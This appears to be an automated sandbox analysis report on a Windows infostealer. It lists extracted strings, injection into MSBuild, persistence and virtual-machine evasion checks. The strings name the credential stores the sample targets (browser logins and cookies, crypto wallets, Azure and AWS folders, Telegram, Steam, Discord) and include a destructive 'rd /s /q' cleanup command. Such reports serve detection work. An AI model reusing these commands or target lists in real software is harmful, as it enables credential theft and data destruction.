StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: x9Lh8czsmo.exe, LocatorTransaction.cs .Net Code: ClearBasicLocator System.Reflection.Assembly.Load(byte[])
Source: x9Lh8czsmo.exe, ScopeExtractor.cs .Net Code: EncodeIntegratedAdapter
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.x9Lh8czsmo.exe.5cd0000.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.x9Lh8czsmo.exe.3abc5f0.0.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3a355b0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.39b5db8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.39b5db8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.5c20000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.5c20000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3975d98.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3a355b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1440562957.0000000003971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1443052351.0000000005C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0040E886
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05C91BE3 pushad ; ret 0_2_05C91BE6
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB3D98 pushfd ; ret 0_2_05CB3D9B
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB8D9F push FFFFFF86h; retf 0_2_05CB8DDA
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5DAD push esp; retf 0_2_05CB5DAE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB6D03 push 6AD005CBh; retf 0_2_05CB6D0E
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5D1B push 00000020h; retf 0_2_05CB5D22
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB8D1F push FFFFFF86h; retf 0_2_05CB8DDA
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5CF3 push eax; retf 0_2_05CB5CFE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5C1B push 4905CB1Ah; retf 0_2_05CB5C25
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5F14 push edx; retf 0_2_05CB5F1A
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5F33 push ecx; retf 0_2_05CB5F46
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5E8B push cs; retf 0_2_05CB5E92
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5E83 push cs; retf 0_2_05CB5E92
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5EB7 push es; retf 0_2_05CB5EBE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5E5B push esp; retf 0_2_05CB5E62
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB59D3 push edx; retf 0_2_05CB59DE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB59E7 push ss; retf 0_2_05CB59EE
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5943 push bx; retf 0_2_05CB594A
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5963 push ss; retf 0_2_05CB5972
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB78EF push 00000074h; retf 0_2_05CB78F6
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB7867 push 00000074h; retf 0_2_05CB78F6
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5BF3 push esp; retf 0_2_05CB5C12
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5B47 push esi; retf 0_2_05CB5B52
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5AAF push edx; retf 0_2_05CB5AC6
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB5A67 push ebx; retf 0_2_05CB5A6E
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D20DE8 push eax; retf 0_2_05D20DE9
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D26D9D pushfd ; retf 0000h 0_2_05D26DA2
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D23D51 push eax; iretd 0_2_05D23D52
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D25417 push eax; iretd 0_2_05D25418
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D2AFE6 push eax; iretd 0_2_05D2AFEB
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D2CF90 pushad ; iretd 0_2_05D2CF91
Source: x9Lh8czsmo.exe Static PE information: section name: .text entropy: 7.199089272024581

Boot Survival

barindex
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0040E886
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory allocated: D30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory allocated: 2970000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory allocated: E80000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\SysWOW64\timeout.exe TID: 8972 Thread sleep count: 84 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00413C71 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose, 2_2_00413C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004112E8 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 2_2_004112E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose, 2_2_00407891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose, 2_2_0040A69C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_00408776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00411D33 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00411D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose, 2_2_004013DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00406784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00412BBE wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 2_2_00409C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00408224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041269A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_0041269A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00411883 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_00411883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040DF8C GetSystemInfo,wsprintfA, 2_2_0040DF8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: Web Data.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: discord.comVMware20,11696494690f
Source: Web Data.9.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Web Data.9.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Web Data.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Web Data.9.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000B28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: msedge.exe, 00000009.00000003.1733370302.00007BAC00330000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: Web Data.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Web Data.9.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Web Data.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Web Data.9.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Web Data.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Web Data.9.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Web Data.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Web Data.9.dr Binary or memory string: global block list test formVMware20,11696494690
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: msedge.exe, 00000009.00000003.1786821463.00007BAC0242C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware.com/
Source: Web Data.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Web Data.9.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Web Data.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Web Data.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Web Data.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information queried: ProcessInformation Jump to behavior
